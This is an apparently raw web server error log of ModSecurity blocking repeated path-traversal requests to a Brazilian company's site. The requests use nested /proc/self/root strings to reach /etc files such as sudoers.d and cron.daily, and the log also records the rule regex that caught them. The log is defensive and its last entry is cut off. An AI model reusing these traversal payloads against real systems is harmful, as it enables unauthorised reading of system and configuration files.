[Mon Mar 16 09:18:51.895835 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.241.46:58932] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1KhXjF1vJNtV6CWrkcwAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:19:42.874556 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:58168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1XglT9VtDQc7bgUyWbQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:19:46.301943 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:57140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1YhXjF1vJNtV6CWrkfwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:19:56.772863 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.243.203:57142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1bI6lpbStxTqkSktaOAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:19:58.653982 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:60116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1bnbQATo66fKoS7w3qwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:08.384468 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.243.203:60126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1eP9ocpUE4ed4uDzYiwAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:09.739052 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.243.203:46996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ebysWC90G-1nBrAw6wAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:11.267648 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.243.203:38618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1ewlT9VtDQc7bgUyWdQAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:12.560779 2026] [:error] [pid 21946:tid 140411565680384] [client 74.7.243.203:38622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1fHbQATo66fKoS7w3rwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:14.743359 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:52724] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1fv9ocpUE4ed4uDzYkQAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:20:16.007020 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:38634] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1gJqj1wV0Si-OkefUeQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:17.285925 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:38646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1gbysWC90G-1nBrAw7gAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:19.247159 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:33366] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1g9SswJuvopo3lOhLxwAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:20.878829 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:38658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1hLABkC4fWIHEf8HWLwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:22.107024 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:58560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1hrysWC90G-1nBrAw8QAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:23.390901 2026] [:error] [pid 10709:tid 140411683178240] [client 74.7.243.203:58566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1hxXjF1vJNtV6CWrkjgAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:24.749532 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:58572] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1iBXjF1vJNtV6CWrkkQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:27.087413 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:58578] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1i_9ocpUE4ed4uDzYlwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:28.394600 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.243.203:58584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1jNSswJuvopo3lOhLzAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:29.180368 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.228.16:33038] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf1jQlT9VtDQc7bgUyWeQAAAQ4"]
[Mon Mar 16 09:20:29.706940 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.243.203:58586] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1jZqj1wV0Si-OkefUggAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:30.961497 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.243.203:48036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf1jpqj1wV0Si-OkefUgwAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:20:32.231161 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:48044] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 